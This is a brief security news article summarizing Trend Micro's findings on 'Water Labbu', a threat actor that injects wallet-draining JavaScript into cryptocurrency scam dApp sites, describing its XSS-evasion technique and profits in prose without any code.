Hackers compromise scam sites to redirect crypto transactions
According to Trend Micro researchers, a threat actor identified as ‘Water Labbu’ is hacking into cryptocurrency scam sites to inject malicious JavaScript with the aim of stealing money from victims scammed.
It is important to note that ‘dApps’ (decentralized applications) are used for liquidity mining. Liquidity mining means that investors lend their cryptocurrencies to a decentralized exchange in exchange for high returns generated via trading fees.
But fraudsters have developed scam versions of ‘dApps’, which impersonate cryptocurrency liquidity mining services to steal victims’ cryptocurrency investments.
As soon as an investor connects his Waller to the dApp, Water Labbu’s script detects if it contains many cryptocurrencies and, if so, tries to steal it using several methods.
Already Water Labbu is said to have made at least $316,728 in profit from nine identified victims while compromising at least 45 fraudulent websites.
In order to compromise scam sites, the threat actor locates scam sites for cryptocurrencies and injects the “dApps” with malicious scripts that merge easily with the site’s systems.
“In one of the cases we analyzed, Water Labbu injected an IMG tag to load a Base64-encoded JavaScript payload using the “onerror” event, in what is known as an XSS evasion technique to bypass Cross-Site Scripting (XSS) filters. The injected payload then generates another script element that loads another script from the delivery server tmpmeta[.]com,” Trend Micro explained in its report.
Once the balance is above 0.005 ETH or 22,000 USDT, the target becomes valid for Water Labbu, and the script then determines whether the victim is using Windows or a mobile OS (Android, iOS). If the victim is on a mobile device, Water Labbu malicious script sends a transaction authorization request via the dApp website, making it look as if it came from the scam website.
If the recipient agrees to the transaction, the malicious script will empty the wallet of available funds and send it to an address of Water Labbu.
The sources for this piece include an article in BleepingComputer.